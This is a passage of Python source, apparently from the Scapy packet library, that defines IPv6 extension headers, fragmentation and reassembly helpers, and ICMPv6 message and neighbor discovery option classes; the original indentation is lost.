# TODO : Check IANA has not defined new values for value field of RouterAlertOption
# TODO : Now that we have that option, we should do something in MLD class that need it
# TODO : IANA has defined ranges of values which can't be easily represented here.
# iana.org/assignments/ipv6-routeralert-values/ipv6-routeralert-values.xhtml
def alignment_delta(self, curpos): # alignment requirement : 2n+0
x = 2 ; y = 0
delta = x*((curpos - y + x - 1)//x) + y - curpos
return delta
class Jumbo(Packet): # IPv6 Hop-By-Hop Option
name = "Jumbo Payload"
fields_desc = [_OTypeField("otype", 0xC2, _hbhopts),
ByteField("optlen", 4),
IntField("jumboplen", None) ]
def alignment_delta(self, curpos): # alignment requirement : 4n+2
x = 4 ; y = 2
delta = x*((curpos - y + x - 1)//x) + y - curpos
return delta
class HAO(Packet): # IPv6 Destination Options Header Option
name = "Home Address Option"
fields_desc = [_OTypeField("otype", 0xC9, _hbhopts),
ByteField("optlen", 16),
IP6Field("hoa", "::") ]
def alignment_delta(self, curpos): # alignment requirement : 8n+6
x = 8 ; y = 6
delta = x*((curpos - y + x - 1)//x) + y - curpos
return delta
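# Worked example of the 8n+6 rule above: if the HAO option would start at
# offset 4 from the beginning of the header, delta = 8*((4 - 6 + 7)//8) + 6 - 4
# = 2, so _HopByHopOptionsField.i2m() emits a 2-byte PadN before the option.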
_hbhoptcls = { 0x00: Pad1,
0x01: PadN,
0x05: RouterAlert,
0xC2: Jumbo,
0xC9: HAO }
######################## Hop-by-Hop Extension Header ########################
class _HopByHopOptionsField(PacketListField):
__slots__ = ["curpos"]
def __init__(self, name, default, cls, curpos, count_from=None, length_from=None):
self.curpos = curpos
PacketListField.__init__(self, name, default, cls, count_from=count_from, length_from=length_from)
def i2len(self, pkt, i):
l = len(self.i2m(pkt, i))
return l
def i2count(self, pkt, i):
if isinstance(i, list):
return len(i)
return 0
def getfield(self, pkt, s):
c = l = None
if self.length_from is not None:
l = self.length_from(pkt)
elif self.count_from is not None:
c = self.count_from(pkt)
opt = []
ret = b""
x = s
if l is not None:
x,ret = s[:l],s[l:]
while x:
if c is not None:
if c <= 0:
break
c -= 1
o = ord(x[0]) # Option type
cls = self.cls
if o in _hbhoptcls:
cls = _hbhoptcls[o]
try:
op = cls(x)
except:
op = self.cls(x)
opt.append(op)
if isinstance(op.payload, conf.raw_layer):
x = op.payload.load
del(op.payload)
else:
x = b""
return x+ret,opt
def i2m(self, pkt, x):
autopad = None
try:
autopad = getattr(pkt, "autopad") # Hack : 'autopad' phantom field
except:
autopad = 1
if not autopad:
return b"".join(map(str, x))
curpos = self.curpos
s = b""
for p in x:
d = p.alignment_delta(curpos)
curpos += d
if d == 1:
s += raw(Pad1())
elif d != 0:
s += raw(PadN(optdata=b'\x00'*(d-2)))
pstr = raw(p)
curpos += len(pstr)
s += pstr
# Let's make the class including our option field
# a multiple of 8 octets long
d = curpos % 8
if d == 0:
return s
d = 8 - d
if d == 1:
s += raw(Pad1())
elif d != 0:
s += raw(PadN(optdata=b'\x00'*(d-2)))
return s
def addfield(self, pkt, s, val):
return s+self.i2m(pkt, val)
class _PhantomAutoPadField(ByteField):
def addfield(self, pkt, s, val):
return s
def getfield(self, pkt, s):
return s, 1
def i2repr(self, pkt, x):
if x:
return "On"
return "Off"
class IPv6ExtHdrHopByHop(_IPv6ExtHdr):
name = "IPv6 Extension Header - Hop-by-Hop Options Header"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, length_of="options", fmt="B",
adjust = lambda pkt,x: (x+2+7)//8 - 1),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_HopByHopOptionsField("options", [], HBHOptUnknown, 2,
length_from = lambda pkt: (8*(pkt.len+1))-2) ]
overload_fields = {IPv6: { "nh": 0 }}
######################## Destination Option Header ##########################
class IPv6ExtHdrDestOpt(_IPv6ExtHdr):
name = "IPv6 Extension Header - Destination Options Header"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, length_of="options", fmt="B",
adjust = lambda pkt,x: (x+2+7)//8 - 1),
_PhantomAutoPadField("autopad", 1), # autopad activated by default
_HopByHopOptionsField("options", [], HBHOptUnknown, 2,
length_from = lambda pkt: (8*(pkt.len+1))-2) ]
overload_fields = {IPv6: { "nh": 60 }}
############################# Routing Header ################################
class IPv6ExtHdrRouting(_IPv6ExtHdr):
name = "IPv6 Option Header Routing"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
FieldLenField("len", None, count_of="addresses", fmt="B",
adjust = lambda pkt,x:2*x), # in 8 bytes blocks
ByteField("type", 0),
ByteField("segleft", None),
BitField("reserved", 0, 32), # There is meaning in this field ...
IP6ListField("addresses", [],
length_from = lambda pkt: 8*pkt.len)]
overload_fields = {IPv6: { "nh": 43 }}
def post_build(self, pkt, pay):
if self.segleft is None:
pkt = pkt[:3]+struct.pack("B", len(self.addresses))+pkt[4:]
return _IPv6ExtHdr.post_build(self, pkt, pay)
######################### Segment Routing Header ############################
# This implementation is based on draft 06, available at:
# https://tools.ietf.org/html/draft-ietf-6man-segment-routing-header-06
class IPv6ExtHdrSegmentRoutingTLV(Packet):
name = "IPv6 Option Header Segment Routing - Generic TLV"
fields_desc = [ ByteField("type", 0),
ByteField("len", 0),
ByteField("reserved", 0),
ByteField("flags", 0),
StrLenField("value", "", length_from=lambda pkt: pkt.len) ]
def extract_padding(self, p):
return b"",p
registered_sr_tlv = {}
@classmethod
def register_variant(cls):
cls.registered_sr_tlv[cls.type.default] = cls
@classmethod
def dispatch_hook(cls, pkt=None, *args, **kargs):
if pkt:
tmp_type = ord(pkt[0])
return cls.registered_sr_tlv.get(tmp_type, cls)
return cls
class IPv6ExtHdrSegmentRoutingTLVIngressNode(IPv6ExtHdrSegmentRoutingTLV):
name = "IPv6 Option Header Segment Routing - Ingress Node TLV"
fields_desc = [ ByteField("type", 1),
ByteField("len", 18),
ByteField("reserved", 0),
ByteField("flags", 0),
IP6Field("ingress_node", "::1") ]
class IPv6ExtHdrSegmentRoutingTLVEgressNode(IPv6ExtHdrSegmentRoutingTLV):
name = "IPv6 Option Header Segment Routing - Egress Node TLV"
fields_desc = [ ByteField("type", 2),
ByteField("len", 18),
ByteField("reserved", 0),
ByteField("flags", 0),
IP6Field("egress_node", "::1") ]
class IPv6ExtHdrSegmentRoutingTLVPadding(IPv6ExtHdrSegmentRoutingTLV):
name = "IPv6 Option Header Segment Routing - Padding TLV"
fields_desc = [ ByteField("type", 4),
FieldLenField("len", None, length_of="padding", fmt="B"),
StrLenField("padding", b"\x00", length_from=lambda pkt: pkt.len) ]
class IPv6ExtHdrSegmentRouting(_IPv6ExtHdr):
name = "IPv6 Option Header Segment Routing"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
ByteField("len", None),
ByteField("type", 4),
ByteField("segleft", None),
ByteField("lastentry", None),
BitField("unused1", 0, 1),
BitField("protected", 0, 1),
BitField("oam", 0, 1),
BitField("alert", 0, 1),
BitField("hmac", 0, 1),
BitField("unused2", 0, 3),
ShortField("tag", 0),
IP6ListField("addresses", ["::1"],
count_from=lambda pkt: pkt.lastentry),
PacketListField("tlv_objects", [], IPv6ExtHdrSegmentRoutingTLV,
length_from=lambda pkt: 8*pkt.len - 16*pkt.lastentry) ]
overload_fields = { IPv6: { "nh": 43 } }
def post_build(self, pkt, pay):
if self.len is None:
# The extension must be aligned on 8 bytes
tmp_mod = (len(pkt) - 8) % 8
if tmp_mod == 1:
warning("IPv6ExtHdrSegmentRouting(): can't pad 1 byte !")
elif tmp_mod >= 2:
#Add the padding extension
tmp_pad = b"\x00" * (tmp_mod-2)
tlv = IPv6ExtHdrSegmentRoutingTLVPadding(padding=tmp_pad)
pkt += raw(tlv)
tmp_len = (len(pkt) - 8) // 8
pkt = pkt[:1] + struct.pack("B", tmp_len)+ pkt[2:]
if self.segleft is None:
tmp_len = len(self.addresses)
if tmp_len:
tmp_len -= 1
pkt = pkt[:3] + struct.pack("B", tmp_len) + pkt[4:]
if self.lastentry is None:
pkt = pkt[:4] + struct.pack("B", len(self.addresses)) + pkt[5:]
return _IPv6ExtHdr.post_build(self, pkt, pay)
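# Illustrative usage sketch (assumed): post_build() above computes len,
# segleft and lastentry and appends a Padding TLV when needed, e.g.
#
#   p = IPv6(dst="2001:db8::1") / IPv6ExtHdrSegmentRouting(
#           addresses=["2001:db8::2", "2001:db8::3"]) / ICMPv6EchoRequest()
#   p = IPv6(raw(p))  # rebuild to inspect the fields that were filled in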
########################### Fragmentation Header ############################
class IPv6ExtHdrFragment(_IPv6ExtHdr):
name = "IPv6 Extension Header - Fragmentation header"
fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
BitField("res1", 0, 8),
BitField("offset", 0, 13),
BitField("res2", 0, 2),
BitField("m", 0, 1),
IntField("id", None) ]
overload_fields = {IPv6: { "nh": 44 }}
def defragment6(packets):
"""
Performs defragmentation of a list of IPv6 packets. Packets are reordered.
Fragments that do not belong are dropped. Missing data is filled in with 'X' characters.
"""
l = [x for x in packets if IPv6ExtHdrFragment in x] # remove non fragments
if not l:
return []
id = l[0][IPv6ExtHdrFragment].id
llen = len(l)
l = [x for x in l if x[IPv6ExtHdrFragment].id == id]
if len(l) != llen:
warning("defragment6: some fragmented packets have been removed from list")
llen = len(l)
# reorder fragments
res = []
while l:
min_pos = 0
min_offset = l[0][IPv6ExtHdrFragment].offset
for pos, p in enumerate(l):
cur_offset = p[IPv6ExtHdrFragment].offset
if cur_offset < min_offset:
min_pos = pos
min_offset = cur_offset
res.append(l[min_pos])
del(l[min_pos])
# regenerate the fragmentable part
fragmentable = b""
for p in res:
q=p[IPv6ExtHdrFragment]
offset = 8*q.offset
if offset != len(fragmentable):
warning("Expected an offset of %d. Found %d. Padding with XXXX" % (len(fragmentable), offset))
fragmentable += b"X"*(offset - len(fragmentable))
fragmentable += raw(q.payload)
# Regenerate the unfragmentable part.
q = res[0]
nh = q[IPv6ExtHdrFragment].nh
q[IPv6ExtHdrFragment].underlayer.nh = nh
del q[IPv6ExtHdrFragment].underlayer.payload
q /= conf.raw_layer(load=fragmentable)
return IPv6(raw(q))
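# Note (added for clarity): defragment6() expects packets that all carry an
# IPv6ExtHdrFragment with the same fragment id; packets without a fragment
# header are ignored, fragments with a different id are dropped with a
# warning, and the reassembled IPv6 packet is returned.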
def fragment6(pkt, fragSize):
"""
Performs fragmentation of an IPv6 packet. Provided packet ('pkt') must already
contain an IPv6ExtHdrFragment() class. 'fragSize' argument is the expected
maximum size of fragments (MTU). The list of packets is returned.
If packet does not contain an IPv6ExtHdrFragment class, it is returned in
result list.
"""
pkt = pkt.copy()
if not IPv6ExtHdrFragment in pkt:
# TODO : automatically add a fragment before upper Layer
# at the moment, we do nothing and return initial packet
# as single element of a list
return [pkt]
# If the payload is bigger than 65535, a Jumbo payload must be used, as
# an IPv6 packet can't be bigger than 65535 bytes.
if len(raw(pkt[IPv6ExtHdrFragment])) > 65535:
warning("An IPv6 packet can'be bigger than 65535, please use a Jumbo payload.")
return []
s = raw(pkt) # for instantiation to get upper layer checksum right
if len(s) <= fragSize:
return [pkt]
# Fragmentable part : fake IPv6 for Fragmentable part length computation
fragPart = pkt[IPv6ExtHdrFragment].payload
tmp = raw(IPv6(src="::1", dst="::1")/fragPart)
fragPartLen = len(tmp) - 40 # basic IPv6 header length
fragPartStr = s[-fragPartLen:]
# Grab Next Header for use in Fragment Header
nh = pkt[IPv6ExtHdrFragment].nh
# Keep fragment header
fragHeader = pkt[IPv6ExtHdrFragment]
del fragHeader.payload # detach payload
# Unfragmentable Part
unfragPartLen = len(s) - fragPartLen - 8
unfragPart = pkt
del pkt[IPv6ExtHdrFragment].underlayer.payload # detach payload
# Cut the fragmentable part to fit fragSize. Inner fragments have
# a length that is an integer multiple of 8 octets. The last
# fragment can be any size below the MTU.
lastFragSize = fragSize - unfragPartLen - 8
innerFragSize = lastFragSize - (lastFragSize % 8)
if lastFragSize <= 0 or innerFragSize == 0:
warning("Provided fragment size value is too low. " +
"Should be more than %d" % (unfragPartLen + 8))
return [unfragPart/fragHeader/fragPart]
remain = fragPartStr
res = []
fragOffset = 0 # offset, incremented during creation
fragId = random.randint(0,0xffffffff) # random id ...
if fragHeader.id is not None: # ... except id provided by user
fragId = fragHeader.id
fragHeader.m = 1
fragHeader.id = fragId
fragHeader.nh = nh
# Main loop : cut, fit to FRAGSIZEs, fragOffset, Id ...
while True:
if (len(remain) > lastFragSize):
tmp = remain[:innerFragSize]
remain = remain[innerFragSize:]
fragHeader.offset = fragOffset # update offset
fragOffset += (innerFragSize // 8) # compute new one
if IPv6 in unfragPart:
unfragPart[IPv6].plen = None
tempo = unfragPart/fragHeader/conf.raw_layer(load=tmp)
res.append(tempo)
else:
fragHeader.offset = fragOffset # update offset
fragHeader.m = 0
if IPv6 in unfragPart:
unfragPart[IPv6].plen = None
tempo = unfragPart/fragHeader/conf.raw_layer(load=remain)
res.append(tempo)
break
return res
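# Illustrative round-trip sketch (assumed, not from the original source):
#
#   big = IPv6(dst="2001:db8::1") / IPv6ExtHdrFragment() \
#         / ICMPv6EchoRequest(data="A" * 3000)
#   frags = fragment6(big, 1280)   # list of fragments, each <= 1280 bytes
#   whole = defragment6(frags)     # reassembled IPv6 packet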
############################### AH Header ###################################
# class _AHFieldLenField(FieldLenField):
# def getfield(self, pkt, s):
# l = getattr(pkt, self.fld)
# l = (l*8)-self.shift
# i = self.m2i(pkt, s[:l])
# return s[l:],i
# class _AHICVStrLenField(StrLenField):
# def i2len(self, pkt, x):
# class IPv6ExtHdrAH(_IPv6ExtHdr):
# name = "IPv6 Extension Header - AH"
# fields_desc = [ ByteEnumField("nh", 59, ipv6nh),
# _AHFieldLenField("len", None, "icv"),
# ShortField("res", 0),
# IntField("spi", 0),
# IntField("sn", 0),
# _AHICVStrLenField("icv", None, "len", shift=2) ]
# overload_fields = {IPv6: { "nh": 51 }}
# def post_build(self, pkt, pay):
# if self.len is None:
# pkt = pkt[0]+struct.pack("!B", 2*len(self.addresses))+pkt[2:]
# if self.segleft is None:
# pkt = pkt[:3]+struct.pack("!B", len(self.addresses))+pkt[4:]
# return _IPv6ExtHdr.post_build(self, pkt, pay)
############################### ESP Header ##################################
# class IPv6ExtHdrESP(_IPv6extHdr):
# name = "IPv6 Extension Header - ESP"
# fields_desc = [ IntField("spi", 0),
# IntField("sn", 0),
# # there is things to extract from IKE work
# ]
# overloads_fields = {IPv6: { "nh": 50 }}
#############################################################################
#############################################################################
### ICMPv6* Classes ###
#############################################################################
#############################################################################
icmp6typescls = { 1: "ICMPv6DestUnreach",
2: "ICMPv6PacketTooBig",
3: "ICMPv6TimeExceeded",
4: "ICMPv6ParamProblem",
128: "ICMPv6EchoRequest",
129: "ICMPv6EchoReply",
130: "ICMPv6MLQuery",
131: "ICMPv6MLReport",
132: "ICMPv6MLDone",
133: "ICMPv6ND_RS",
134: "ICMPv6ND_RA",
135: "ICMPv6ND_NS",
136: "ICMPv6ND_NA",
137: "ICMPv6ND_Redirect",
#138: Do Me - RFC 2894 - Seems painful
139: "ICMPv6NIQuery",
140: "ICMPv6NIReply",
141: "ICMPv6ND_INDSol",
142: "ICMPv6ND_INDAdv",
#143: Do Me - RFC 3810
144: "ICMPv6HAADRequest",
145: "ICMPv6HAADReply",
146: "ICMPv6MPSol",
147: "ICMPv6MPAdv",
#148: Do Me - SEND related - RFC 3971
#149: Do Me - SEND related - RFC 3971
151: "ICMPv6MRD_Advertisement",
152: "ICMPv6MRD_Solicitation",
153: "ICMPv6MRD_Termination",
}
icmp6typesminhdrlen = { 1: 8,
2: 8,
3: 8,
4: 8,
128: 8,
129: 8,
130: 24,
131: 24,
132: 24,
133: 8,
134: 16,
135: 24,
136: 24,
137: 40,
#139:
#140
141: 8,
142: 8,
144: 8,
145: 8,
146: 8,
147: 8,
151: 8,
152: 4,
153: 4
}
icmp6types = { 1 : "Destination unreachable",
2 : "Packet too big",
3 : "Time exceeded",
4 : "Parameter problem",
100 : "Private Experimentation",
101 : "Private Experimentation",
128 : "Echo Request",
129 : "Echo Reply",
130 : "MLD Query",
131 : "MLD Report",
132 : "MLD Done",
133 : "Router Solicitation",
134 : "Router Advertisement",
135 : "Neighbor Solicitation",
136 : "Neighbor Advertisement",
137 : "Redirect Message",
138 : "Router Renumbering",
139 : "ICMP Node Information Query",
140 : "ICMP Node Information Response",
141 : "Inverse Neighbor Discovery Solicitation Message",
142 : "Inverse Neighbor Discovery Advertisement Message",
143 : "Version 2 Multicast Listener Report",
144 : "Home Agent Address Discovery Request Message",
145 : "Home Agent Address Discovery Reply Message",
146 : "Mobile Prefix Solicitation",
147 : "Mobile Prefix Advertisement",
148 : "Certification Path Solicitation",
149 : "Certification Path Advertisement",
151 : "Multicast Router Advertisement",
152 : "Multicast Router Solicitation",
153 : "Multicast Router Termination",
200 : "Private Experimentation",
201 : "Private Experimentation" }
class _ICMPv6(Packet):
name = "ICMPv6 dummy class"
overload_fields = {IPv6: {"nh": 58}}
def post_build(self, p, pay):
p += pay
if self.cksum == None:
chksum = in6_chksum(58, self.underlayer, p)
p = p[:2]+struct.pack("!H", chksum)+p[4:]
return p
def hashret(self):
return self.payload.hashret()
def answers(self, other):
# isinstance(self.underlayer, _IPv6ExtHdr) may introduce a bug ...
if (isinstance(self.underlayer, IPerror6) or
isinstance(self.underlayer, _IPv6ExtHdr) and
isinstance(other, _ICMPv6)):
if not ((self.type == other.type) and
(self.code == other.code)):
return 0
return 1
return 0
class _ICMPv6Error(_ICMPv6):
name = "ICMPv6 errors dummy class"
def guess_payload_class(self,p):
return IPerror6
class ICMPv6Unknown(_ICMPv6):
name = "Scapy6 ICMPv6 fallback class"
fields_desc = [ ByteEnumField("type",1, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
StrField("msgbody", "")]
################################## RFC 2460 #################################
class ICMPv6DestUnreach(_ICMPv6Error):
name = "ICMPv6 Destination Unreachable"
fields_desc = [ ByteEnumField("type",1, icmp6types),
ByteEnumField("code",0, { 0: "No route to destination",
1: "Communication with destination administratively prohibited",
2: "Beyond scope of source address",
3: "Address unreachable",
4: "Port unreachable" }),
XShortField("cksum", None),
ByteField("length", 0),
X3BytesField("unused",0)]
class ICMPv6PacketTooBig(_ICMPv6Error):
name = "ICMPv6 Packet Too Big"
fields_desc = [ ByteEnumField("type",2, icmp6types),
ByteField("code",0),
XShortField("cksum", None),
IntField("mtu",1280)]
class ICMPv6TimeExceeded(_ICMPv6Error):
name = "ICMPv6 Time Exceeded"
fields_desc = [ ByteEnumField("type",3, icmp6types),
ByteEnumField("code",0, { 0: "hop limit exceeded in transit",
1: "fragment reassembly time exceeded"}),
XShortField("cksum", None),
ByteField("length", 0),
X3BytesField("unused",0)]
# The default pointer value is set to the next header field of
# the encapsulated IPv6 packet
class ICMPv6ParamProblem(_ICMPv6Error):
name = "ICMPv6 Parameter Problem"
fields_desc = [ ByteEnumField("type",4, icmp6types),
ByteEnumField("code",0, {0: "erroneous header field encountered",
1: "unrecognized Next Header type encountered",
2: "unrecognized IPv6 option encountered"}),
XShortField("cksum", None),
IntField("ptr",6)]
class ICMPv6EchoRequest(_ICMPv6):
name = "ICMPv6 Echo Request"
fields_desc = [ ByteEnumField("type", 128, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
XShortField("id",0),
XShortField("seq",0),
StrField("data", "")]
def mysummary(self):
return self.sprintf("%name% (id: %id% seq: %seq%)")
def hashret(self):
return struct.pack("HH",self.id,self.seq)+self.payload.hashret()
class ICMPv6EchoReply(ICMPv6EchoRequest):
name = "ICMPv6 Echo Reply"
type = 129
def answers(self, other):
# We could match data content between request and reply.
return (isinstance(other, ICMPv6EchoRequest) and
self.id == other.id and self.seq == other.seq and
self.data == other.data)
############ ICMPv6 Multicast Listener Discovery (RFC3810) ##################
# All MLD messages are sent with a link-local source address.
# -> Enforce this in post_build if none is specified.
# The Hop-Limit value must be 1.
# "and an IPv6 Router Alert option in a Hop-by-Hop Options
# header. (The router alert option is necessary to cause routers to
# examine MLD messages sent to multicast addresses in which the router
# itself has no interest"
class _ICMPv6ML(_ICMPv6):
fields_desc = [ ByteEnumField("type", 130, icmp6types),
ByteField("code", 0),
XShortField("cksum", None),
ShortField("mrd", 0),
ShortField("reserved", 0),
IP6Field("mladdr","::")]
# general queries are sent to the link-scope all-nodes multicast
# address ff02::1, with a multicast address field of 0 and a MRD of
# [Query Response Interval]
# Default value for mladdr is set to 0 for a General Query, and
# overloaded by the user for a Multicast Address specific query
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLQuery(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Query"
type = 130
mrd = 10000 # 10s for mrd
mladdr = "::"
overload_fields = {IPv6: { "dst": "ff02::1", "hlim": 1, "nh": 58 }}
def hashret(self):
if self.mladdr != "::":
return (
inet_pton(socket.AF_INET6, self.mladdr) + self.payload.hashret()
)
else:
return self.payload.hashret()
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLReport(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Report"
type = 131
overload_fields = {IPv6: {"hlim": 1, "nh": 58}}
# TODO: implement hashret() and answers()
# When a node ceases to listen to a multicast address on an interface,
# it SHOULD send a single Done message to the link-scope all-routers
# multicast address (FF02::2), carrying in its multicast address field
# the address to which it is ceasing to listen
# TODO : See what we can do to automatically include a Router Alert
# Option in a Destination Option Header.
class ICMPv6MLDone(_ICMPv6ML): # RFC 2710
name = "MLD - Multicast Listener Done"
type = 132
overload_fields = {IPv6: { "dst": "ff02::2", "hlim": 1, "nh": 58}}
########## ICMPv6 MRD - Multicast Router Discovery (RFC 4286) ###############
# TODO:
# - 04/09/06 troglocan : find a way to automatically add a router alert
# option for all MRD packets. This could be done in a specific
# way when IPv6 is the under layer with some specific keyword
# like 'exthdr'. This would allow to keep compatibility with
# providing IPv6 fields to be overloaded in fields_desc.
#
# At the moment, if user inserts an IPv6 Router alert option
# none of the IPv6 default values of IPv6 layer will be set.
class ICMPv6MRD_Advertisement(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Advertisement"
fields_desc = [ByteEnumField("type", 151, icmp6types),
ByteField("advinter", 20),
XShortField("cksum", None),
ShortField("queryint", 0),
ShortField("robustness", 0)]
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::2"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:8], s[8:]
class ICMPv6MRD_Solicitation(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Solicitation"
fields_desc = [ByteEnumField("type", 152, icmp6types),
ByteField("res", 0),
XShortField("cksum", None) ]
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::2"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:4], s[4:]
class ICMPv6MRD_Termination(_ICMPv6):
name = "ICMPv6 Multicast Router Discovery Termination"
fields_desc = [ByteEnumField("type", 153, icmp6types),
ByteField("res", 0),
XShortField("cksum", None) ]
overload_fields = {IPv6: { "nh": 58, "hlim": 1, "dst": "ff02::6A"}}
# IPv6 Router Alert requires manual inclusion
def extract_padding(self, s):
return s[:4], s[4:]
################### ICMPv6 Neighbor Discovery (RFC 2461) ####################
icmp6ndopts = { 1: "Source Link-Layer Address",
2: "Target Link-Layer Address",
3: "Prefix Information",
4: "Redirected Header",
5: "MTU",
6: "NBMA Shortcut Limit Option", # RFC2491
7: "Advertisement Interval Option",
8: "Home Agent Information Option",
9: "Source Address List",
10: "Target Address List",
11: "CGA Option", # RFC 3971
12: "RSA Signature Option", # RFC 3971
13: "Timestamp Option", # RFC 3971
14: "Nonce option", # RFC 3971
15: "Trust Anchor Option", # RFC 3971
16: "Certificate Option", # RFC 3971
17: "IP Address Option", # RFC 4068
18: "New Router Prefix Information Option", # RFC 4068
19: "Link-layer Address Option", # RFC 4068
20: "Neighbor Advertisement Acknowledgement Option",
21: "CARD Request Option", # RFC 4065/4066/4067
22: "CARD Reply Option", # RFC 4065/4066/4067
23: "MAP Option", # RFC 4140
24: "Route Information Option", # RFC 4191
25: "Recusive DNS Server Option",
26: "IPv6 Router Advertisement Flags Option"
}
icmp6ndoptscls = { 1: "ICMPv6NDOptSrcLLAddr",
2: "ICMPv6NDOptDstLLAddr",
3: "ICMPv6NDOptPrefixInfo",
4: "ICMPv6NDOptRedirectedHdr",
5: "ICMPv6NDOptMTU",
6: "ICMPv6NDOptShortcutLimit",
7: "ICMPv6NDOptAdvInterval",
8: "ICMPv6NDOptHAInfo",
9: "ICMPv6NDOptSrcAddrList",
10: "ICMPv6NDOptTgtAddrList",
#11: Do Me,
#12: Do Me,
#13: Do Me,
#14: Do Me,
#15: Do Me,
#16: Do Me,
17: "ICMPv6NDOptIPAddr",
18: "ICMPv6NDOptNewRtrPrefix",
19: "ICMPv6NDOptLLA",
#18: Do Me,
#19: Do Me,
#20: Do Me,
#21: Do Me,
#22: Do Me,
23: "ICMPv6NDOptMAP",
24: "ICMPv6NDOptRouteInfo",
25: "ICMPv6NDOptRDNSS",
26: "ICMPv6NDOptEFA",
31: "ICMPv6NDOptDNSSL"
}
class _ICMPv6NDGuessPayload:
name = "Dummy ND class that implements guess_payload_class()"
def guess_payload_class(self,p):
if len(p) > 1:
return get_cls(icmp6ndoptscls.get(ord(p[0]),"Raw"), "Raw") # s/Raw/ICMPv6NDOptUnknown/g ?
# Beginning of ICMPv6 Neighbor Discovery Options.
class ICMPv6NDOptUnknown(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Scapy Unimplemented"
fields_desc = [ ByteField("type",None),
FieldLenField("len",None,length_of="data",fmt="B",
adjust = lambda pkt,x: x+2),
StrLenField("data","",
length_from = lambda pkt: pkt.len-2) ]
# NOTE: len includes type and len field. Expressed in unit of 8 bytes
# TODO: revisit the use of ETHER_ANY
class ICMPv6NDOptSrcLLAddr(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Source Link-Layer Address"
fields_desc = [ ByteField("type", 1),
ByteField("len", 1),
MACField("lladdr", ETHER_ANY) ]
def mysummary(self):
return self.sprintf("%name% %lladdr%")
class ICMPv6NDOptDstLLAddr(ICMPv6NDOptSrcLLAddr):
name = "ICMPv6 Neighbor Discovery Option - Destination Link-Layer Address"
type = 2
class ICMPv6NDOptPrefixInfo(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Prefix Information"
fields_desc = [ ByteField("type",3),
ByteField("len",4),
ByteField("prefixlen",None),
BitField("L",1,1),
BitField("A",1,1),
BitField("R",0,1),
BitField("res1",0,5),
XIntField("validlifetime",0xffffffff),
XIntField("preferredlifetime",0xffffffff),
XIntField("res2",0x00000000),
IP6Field("prefix","::") ]
def mysummary(self):
return self.sprintf("%name% %prefix%")
# TODO: We should also limit the size of included packet to something
# like (initiallen - 40 - 2)
class TruncPktLenField(PacketLenField):
__slots__ = ["cur_shift"]
def __init__(self, name, default, cls, cur_shift, length_from=None, shift=0):
PacketLenField.__init__(self, name, default, cls, length_from=length_from)
self.cur_shift = cur_shift
def getfield(self, pkt, s):
l = self.length_from(pkt)
i = self.m2i(pkt, s[:l])
return s[l:],i
def m2i(self, pkt, m):
s = None
try: # It can happen we have sth shorter than 40 bytes
s = self.cls(m)
except:
return conf.raw_layer(m)
return s
def i2m(self, pkt, x):
s = raw(x)
l = len(s)
r = (l + self.cur_shift) % 8
l = l - r
return s[:l]
def i2len(self, pkt, i):
return len(self.i2m(pkt, i))
# TODO: add a post_build to recompute the length (as a multiple of 8 octets)
class ICMPv6NDOptRedirectedHdr(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - Redirected Header"
fields_desc = [ ByteField("type",4),
FieldLenField("len", None, length_of="pkt", fmt="B",
adjust = lambda pkt,x:(x+8)//8),
StrFixedLenField("res", b"\x00"*6, 6),
TruncPktLenField("pkt", b"", IPv6, 8,
length_from = lambda pkt: 8*pkt.len-8) ]
# See which value should be used for default MTU instead of 1280
class ICMPv6NDOptMTU(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery Option - MTU"
fields_desc = [ ByteField("type",5),
ByteField("len",1),
XShortField("res",0),
IntField("mtu",1280)]
class ICMPv6NDOptShortcutLimit(_ICMPv6NDGuessPayload, Packet): # RFC 2491
name = "ICMPv6 Neighbor Discovery Option - NBMA Shortcut Limit"
fields_desc = [ ByteField("type", 6),
ByteField("len", 1),
ByteField("shortcutlim", 40), # XXX
ByteField("res1", 0),
IntField("res2", 0) ]
class ICMPv6NDOptAdvInterval(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery - Interval Advertisement"
fields_desc = [ ByteField("type",7),
ByteField("len",1),
ShortField("res", 0),
IntField("advint", 0) ]
def mysummary(self):
return self.sprintf("%name% %advint% milliseconds")
class ICMPv6NDOptHAInfo(_ICMPv6NDGuessPayload, Packet):
name = "ICMPv6 Neighbor Discovery - Home Agent Information"
fields_desc = [ ByteField("type",8),
ByteField("len",1),
ShortField("res", 0),
ShortField("pref", 0),
ShortField("lifetime", 1)]
def mysummary(self):
return self.sprintf("%name% %pref% %lifetime% seconds")
# type 9 : See ICMPv6NDOptSrcAddrList class below in IND (RFC 3122) support
# type 10 : See ICMPv6NDOptTgtAddrList class below in IND (RFC 3122) support
class ICMPv6NDOptIPAddr(_ICMPv6NDGuessPayload, Packet): # RFC 4068
name = "ICMPv6 Neighbor Discovery - IP Address Option (FH for MIPv6)"
fields_desc = [ ByteField("type",17),
ByteField("len", 3),
ByteEnumField("optcode", 1, {1: "Old Care-Of Address",
2: "New Care-Of Address",
3: "NAR's IP address" }),
ByteField("plen", 64),
IntField("res", 0),
